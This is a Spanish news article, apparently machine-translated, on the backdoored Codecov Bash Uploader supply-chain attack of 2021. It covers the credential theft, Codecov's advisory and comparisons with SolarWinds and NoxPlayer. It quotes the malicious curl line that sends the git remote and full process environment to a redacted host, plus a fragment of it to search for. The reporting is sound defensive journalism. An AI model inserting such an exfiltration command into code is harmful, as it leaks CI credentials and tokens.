Tecnología

La herramienta de desarrollo de puerta trasera que robó las credenciales pasó desapercibida durante 3 meses

La herramienta de desarrollo de puerta trasera que robó las credenciales pasó desapercibida durante 3 meses

imágenes falsas

Una herramienta de desarrollo de software disponible públicamente contenía código malicioso que robaba la información de autenticación que las aplicaciones necesitan para acceder a recursos confidenciales. Es el último descubrimiento en un ataque a la cadena de suministro que tiene el potencial de dejar atrás las redes de innumerables organizaciones.

El cargador de Codecov Bash contuvo la puerta trasera desde finales de enero hasta principios de abril, anunciaron los desarrolladores de la herramienta el jueves. La puerta trasera hizo que las computadoras de los desarrolladores enviaran tokens de autenticación secretos y otros datos confidenciales a una ubicación remota controlada por los piratas informáticos. El cargador trabaja con plataformas de desarrollo como Github Actions, CircleCI y Bitrise Step, todas las cuales admiten la presencia de dichos tokens de autenticación secretos en el entorno de desarrollo.

Una pila de AWS y otras credenciales de la nube

Codecov-Bash-Uploader realiza lo que se conoce como cobertura de código para grandes proyectos de desarrollo de software. Los desarrolladores pueden usarlo para enviar informes de cobertura que, entre otras cosas, determinan qué parte de un código base ha sido probado por scripts de prueba internos. Algunos proyectos de desarrollo incorporan Codecov y servicios de terceros similares en sus plataformas, dándoles acceso gratuito a credenciales confidenciales que pueden usarse para robar o alterar el código fuente.

Un código similar a esta única línea apareció por primera vez el 31 de enero:

curl -sm 0.5 -d “$(git remote -v)<<<<<< ENV $(env)” https:///upload/v2 || true

El código envía tanto la ubicación del repositorio de GitHub como todo el entorno del proceso a la ubicación remota, que fue redactada ya que Codecov afirma que es parte de una investigación federal en curso. En estos entornos, los tokens, las credenciales y otros secretos de software generalmente se almacenan en Amazon Web Services o GitHub.

Armado con estos secretos, no hay escasez de cosas maliciosas que un atacante podría hacer en entornos de desarrollo que dependen de la herramienta, dijo HD Moore, investigador de seguridad y director ejecutivo de la plataforma de descubrimiento de redes Rumble.

«Realmente depende de lo que haya en el entorno, pero desde el momento en que los atacantes obtuvieron acceso (a través del cargador de bash), potencialmente pudieron poner puertas traseras en los sistemas en los que se estaban ejecutando», escribió en un mensaje directo a Ars. «Para GitHub / CircleCI, esto habría expuesto principalmente el código fuente y las credenciales».

Moore continuó:

Los atacantes probablemente tenían una pila de AWS y otras credenciales en la nube además de tokens que podrían darles acceso a repositorios privados que contienen código fuente, pero también cualquier otra cosa para la que el token esté autorizado. Al final, esas credenciales serían autosuficientes: los atacantes usan un token de GitHub robado para engañar al código fuente, que luego roba datos de clientes posteriores, etc. Lo mismo podría ocurrir con AWS y otras credenciales de la nube. Si las credenciales lo permiten, pueden permitir la toma de control de la infraestructura, el acceso a la base de datos, el acceso a archivos, etc.

En la recomendación del jueves, Codecov dijo que la versión maliciosa del cargador de bash podría acceder a:

  • Todas las credenciales, tokens o claves que nuestros clientes hayan pasado a través de su corredor de CI (Integración continua) y a las que se pueda acceder al ejecutar el script Bash Uploader.
  • Cualquier servicio, almacén de datos y código de aplicación al que se pueda acceder con estas credenciales, tokens o claves.
  • La información remota de Git (url del repositorio de origen) de los repositorios que los cargadores de bash usan para cargar la cobertura en Codecov en CI

«Según los resultados de la investigación forense hasta el momento, parece haber un acceso no autorizado regular a una clave GCS (Google Cloud Storage) a partir del 31 de enero de 2021, lo que permitió a un tercero malintencionado cargar una versión de nuestro script de carga de bash Modify Puede estar exportando información que está sujeta a la integración continua a un servidor de terceros ”, dijo Codecov. «Codecov guardó y corrigió el guión el 1 de abril de 2021».

La recomendación de Codecov establece que debido a un error en el proceso de generación de imágenes de Docker de Codecov, el pirata informático pudo extraer las credenciales necesarias para modificar el script de subida de Bash.

La manipulación fue descubierta el 1 de abril por un cliente que descubrió que el shasum, que actúa como una huella digital para confirmar la integridad del cargador de bash, no coincidía con el shasum de los descargados de https://codecov.io/bash La versión coincide. El cliente se puso en contacto con Codecov y el fabricante de herramientas sacó la versión maliciosa y abrió una investigación.

Codecov está pidiendo a cualquier persona que haya utilizado el actualizador de bash durante el período afectado que revoque cualquier credencial, token o clave en los procesos de CI y cree otras nuevas. Los desarrolladores pueden determinar qué claves y tokens se almacenan en un entorno de CI haciendo esto env Comando en la canalización de CI. Todo lo que sea sensible debe considerarse en riesgo.

Además, cualquiera que use una versión guardada localmente del cargador de bash debe verificar lo siguiente:

Curl -sm 0.5 -d “$(git remote -v)

Si estos comandos aparecen en cualquier lugar de un cargador bash almacenado localmente, los usuarios deben reemplazar inmediatamente el cargador con la última versión de https://codecov.io/bash.

Codecov dijo que es poco probable que los desarrolladores que utilizan una versión autohospedada de la actualización de bash se vean afectados. “Para verse afectado, su canalización de CI debe extraer el cargador bash de https://codecov.io/bash en lugar de su instalación de Codecov autohospedada. Puede verificar de dónde está obteniendo el cargador bash mirando la configuración de su canal de CI ”, dijo la compañía.

El atractivo de los ataques a la cadena de suministro

El compromiso del sistema de distribución y desarrollo de software de Codecov es el ataque más reciente a la cadena de suministro. En diciembre, SolarWinds, el fabricante de herramientas de gestión de red con sede en Austin, Texas, que utilizan alrededor de 300.000 empresas en todo el mundo, incluidas las empresas Fortune 500 y agencias gubernamentales, asumió un compromiso similar.

Los piratas informáticos que cometieron la infracción luego distribuyeron una actualización de puerta trasera que fue descargada por alrededor de 18,000 clientes. Aproximadamente 10 agencias federales de EE. UU. Y 100 empresas privadas finalmente recibieron la siguiente carga útil, que envió información confidencial a los servidores controlados por los atacantes. FireEye, Microsoft, Mimecast y Malwarebytes participaron en la campaña.

Más recientemente, los piratas informáticos llevaron a cabo un ataque a la cadena de suministro de software que instaló malware de vigilancia en las computadoras de las personas que usaban NoxPlayer, un paquete de software que emula el sistema operativo Android en PC y Mac, dirigido principalmente a los usuarios que estas plataformas pueden jugar juegos móviles. Según los investigadores de ESET, una versión de puerta trasera de NoxPlayer estuvo disponible durante cinco meses.

El atractivo de los ataques a la cadena de suministro para los piratas informáticos radica en su amplitud y eficacia. Al exponer a un solo jugador con una gran oferta de software, los piratas informáticos pueden potencialmente infectar a cualquier persona u organización que utilice el producto comprometido. Otra característica que los piratas informáticos encuentran beneficiosa: muchas veces, los objetivos pueden hacer poco o nada para detectar software malicioso distribuido de esta manera, ya que las firmas digitales indican que es legítimo.

Sin embargo, en el caso de la versión de actualización de bash de puerta trasera, habría sido fácil para Codecov o uno de sus clientes detectar la malicia con solo verificar el shasum. La capacidad de la versión maliciosa para evadir la notificación durante tres meses indica que nadie se molestó en realizar esta simple verificación.

Las personas que usaron el actualizador Bash entre el 31 de enero y el 1 de abril deben examinar cuidadosamente sus compilaciones de desarrollo para detectar signos de compensaciones siguiendo los pasos descritos en el aviso del jueves.

Más populares

To Top